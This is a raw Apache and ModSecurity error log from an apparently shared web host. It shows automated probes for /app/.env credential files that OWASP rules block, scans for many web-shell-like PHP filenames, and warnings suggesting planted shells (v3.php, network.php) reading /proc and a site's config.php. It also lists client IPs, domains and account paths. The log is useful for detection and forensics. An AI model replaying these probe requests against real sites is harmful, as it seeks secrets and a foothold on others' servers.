[Tue May 12 04:01:32.065466 2026] [:error] [pid 1691274:tid 1691285] [client 74.7.243.217:56768] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:01:44.604193 2026] [:error] [pid 1707624:tid 1707697] [client 74.7.243.217:52582] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:01:57.847001 2026] [:error] [pid 1730175:tid 1730195] [client 74.7.243.217:38832] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=f
[Tue May 12 04:02:10.548281 2026] [:error] [pid 1730175:tid 1730186] [client 74.7.243.217:52588] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:02:23.146424 2026] [:error] [pid 1730175:tid 1730183] [client 74.7.243.217:60404] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:02:35.785710 2026] [:error] [pid 1730207:tid 1730233] [client 74.7.243.217:33086] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=m
[Tue May 12 04:02:48.496107 2026] [:error] [pid 1695975:tid 1695989] [client 74.7.243.217:39288] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=f
[Tue May 12 04:03:01.048708 2026] [:error] [pid 1730175:tid 1730190] [client 74.7.243.217:58332] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:03:08.115322 2026] [security2:error] [pid 1709071:tid 1709096] [client 146.56.199.139:35570] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agKKXLvMumyrWMfSu7rAagAAAMk"]
PHP Warning:  filesize(): stat failed for /proc/39/task/39/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/39/task/39/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/39/task/39/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/39/task/39/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/39/task/39/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/39/task/39/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:03:13.830568 2026] [:error] [pid 1707624:tid 1707686] [client 74.7.243.217:34128] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=f
[Tue May 12 04:03:46.994517 2026] [security2:error] [pid 1730207:tid 1730226] [client 176.65.139.238:46908] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agKKgjue9Sp-pIv_Bb6mfwAAAVE"]
[Tue May 12 04:03:46.994765 2026] [security2:error] [pid 1730207:tid 1730226] [client 176.65.139.238:46908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agKKgjue9Sp-pIv_Bb6mfwAAAVE"]
[Tue May 12 04:03:47.022299 2026] [security2:error] [pid 1730207:tid 1730226] [client 176.65.139.238:46908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agKKgjue9Sp-pIv_Bb6mfwAAAVE"]
[Tue May 12 04:03:54.804833 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/ms-themes.php
[Tue May 12 04:03:54.855372 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/chosen.php
[Tue May 12 04:03:54.902774 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/file.php
[Tue May 12 04:03:54.953781 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/flower.php
[Tue May 12 04:03:55.000217 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/gifclass.php
[Tue May 12 04:03:55.053290 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/bless.php
[Tue May 12 04:03:55.107036 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/class-t.api.php
[Tue May 12 04:03:55.154960 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/blurbs.php
[Tue May 12 04:03:55.201624 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/akcc.php
[Tue May 12 04:03:55.248733 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/abcd.php
[Tue May 12 04:03:55.296430 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/shelp.php
[Tue May 12 04:03:55.342994 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/cord.php
[Tue May 12 04:03:55.390821 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/dex.php
[Tue May 12 04:03:55.484337 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/zwso.php
[Tue May 12 04:03:55.579453 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/bolt.php
[Tue May 12 04:03:55.631083 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/cjfuns.php
[Tue May 12 04:03:55.827196 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/ioxi-o.php
[Tue May 12 04:03:55.874998 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/insc.php
[Tue May 12 04:03:55.922455 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/classwithtostring.php
[Tue May 12 04:03:55.968797 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/txets.php
[Tue May 12 04:03:56.167699 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/goods.php
[Tue May 12 04:03:56.216031 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/wp-editor.php
[Tue May 12 04:03:56.263339 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/lufix.php
[Tue May 12 04:03:56.314838 2026] [:error] [pid 1695975:tid 1695991] [client 104.28.208.60:10159] File does not exist: /home/sierraim/public_html/style.php
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704346/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704346/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704346/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704346/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704346/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704346/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:04:20.433113 2026] [security2:error] [pid 1709071:tid 1709109] [client 176.65.139.229:50344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/app/.env"] [unique_id "agKKpLvMumyrWMfSu7rAvgAAANY"]
[Tue May 12 04:04:20.433329 2026] [security2:error] [pid 1709071:tid 1709109] [client 176.65.139.229:50344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/app/.env"] [unique_id "agKKpLvMumyrWMfSu7rAvgAAANY"]
[Tue May 12 04:04:21.298089 2026] [security2:error] [pid 1730207:tid 1730224] [client 176.65.139.229:50350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-de-mobilite-regional.com"] [uri "/app/.env"] [unique_id "agKKpTue9Sp-pIv_Bb6m6gAAAU8"]
[Tue May 12 04:04:21.298312 2026] [security2:error] [pid 1730207:tid 1730224] [client 176.65.139.229:50350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-de-mobilite-regional.com"] [uri "/app/.env"] [unique_id "agKKpTue9Sp-pIv_Bb6m6gAAAU8"]
[Tue May 12 04:04:21.462235 2026] [security2:error] [pid 1709071:tid 1709109] [client 176.65.139.229:50344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agKKpLvMumyrWMfSu7rAvgAAANY"]
[Tue May 12 04:04:22.245021 2026] [security2:error] [pid 1730207:tid 1730224] [client 176.65.139.229:50350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-de-mobilite-regional.com"] [uri "/index.php"] [unique_id "agKKpTue9Sp-pIv_Bb6m6gAAAU8"]
[Tue May 12 04:05:19.622099 2026] [security2:error] [pid 1730207:tid 1730214] [client 43.133.54.83:45166] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKK3zue9Sp-pIv_Bb6nDQAAAUU"], referer: http://tchatbooster.fr
[Tue May 12 04:05:37.140651 2026] [security2:error] [pid 1707624:tid 1707683] [client 176.65.139.234:33912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/app/.env"] [unique_id "agKK8bOxS7i6i_mT2NLhwwAAAEE"]
[Tue May 12 04:05:37.140876 2026] [security2:error] [pid 1707624:tid 1707683] [client 176.65.139.234:33912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/app/.env"] [unique_id "agKK8bOxS7i6i_mT2NLhwwAAAEE"]
[Tue May 12 04:05:40.490610 2026] [security2:error] [pid 1707624:tid 1707683] [client 176.65.139.234:33912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agKK8bOxS7i6i_mT2NLhwwAAAEE"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705475/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705475/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705475/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705475/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705475/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705475/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:06:35.581101 2026] [security2:error] [pid 1709071:tid 1709111] [client 176.65.139.231:60760] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agKLK7vMumyrWMfSu7rBogAAANg"]
[Tue May 12 04:06:35.581341 2026] [security2:error] [pid 1709071:tid 1709111] [client 176.65.139.231:60760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agKLK7vMumyrWMfSu7rBogAAANg"]
[Tue May 12 04:06:35.581565 2026] [security2:error] [pid 1709071:tid 1709111] [client 176.65.139.231:60760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agKLK7vMumyrWMfSu7rBogAAANg"]
PHP Warning:  filesize(): stat failed for /proc/110/task/110/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/110/task/110/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/110/task/110/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/334/task/334/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/334/task/334/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/334/task/334/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/334/task/334/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/334/task/334/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/334/task/334/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:07:14.167626 2026] [authz_core:error] [pid 1695975:tid 1696001] [client 216.73.216.110:41268] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Silex/error_log
[Tue May 12 04:07:58.653429 2026] [security2:error] [pid 1730175:tid 1730199] [client 43.157.172.39:56246] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agKLfno6NvB9WXx5V-6S7QAAARY"]
[Tue May 12 04:08:42.974998 2026] [security2:error] [pid 1695975:tid 1695989] [client 43.166.247.82:38588] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agKLqtVI9ymHBxup74-jvQAAAIs"]
[Tue May 12 04:08:46.871267 2026] [security2:error] [pid 1695975:tid 1695986] [client 43.166.247.82:44482] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agKLrtVI9ymHBxup74-jwAAAAIg"], referer: http://labaujue.com
[Tue May 12 04:08:47.972638 2026] [security2:error] [pid 1709071:tid 1709098] [client 129.226.94.52:49842] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/evjf-helene/"] [unique_id "agKLr7vMumyrWMfSu7rC-QAAAMs"]
PHP Warning:  filesize(): stat failed for /proc/596/task/596/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/596/task/596/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/596/task/596/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:09:16.294988 2026] [security2:error] [pid 1707624:tid 1707706] [client 43.134.121.208:40420] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-json/wp/v2/categories/26"] [unique_id "agKLzLOxS7i6i_mT2NLjFgAAAFg"]
[Tue May 12 04:09:18.839427 2026] [autoindex:error] [pid 1730207:tid 1730225] [client 114.119.143.207:22215] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 04:09:24.222438 2026] [security2:error] [pid 1709071:tid 1709097] [client 43.155.195.141:37100] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/chambre-3-bali/"] [unique_id "agKL1LvMumyrWMfSu7rDIwAAAMo"]
[Tue May 12 04:09:26.567228 2026] [security2:error] [pid 1695975:tid 1695990] [client 216.73.216.110:17053] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: /config.php found within ARGS:filesrc: /home/missmand/public_html/learning/admin/lib/config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKL1tVI9ymHBxup74-kDgAAAIw"]
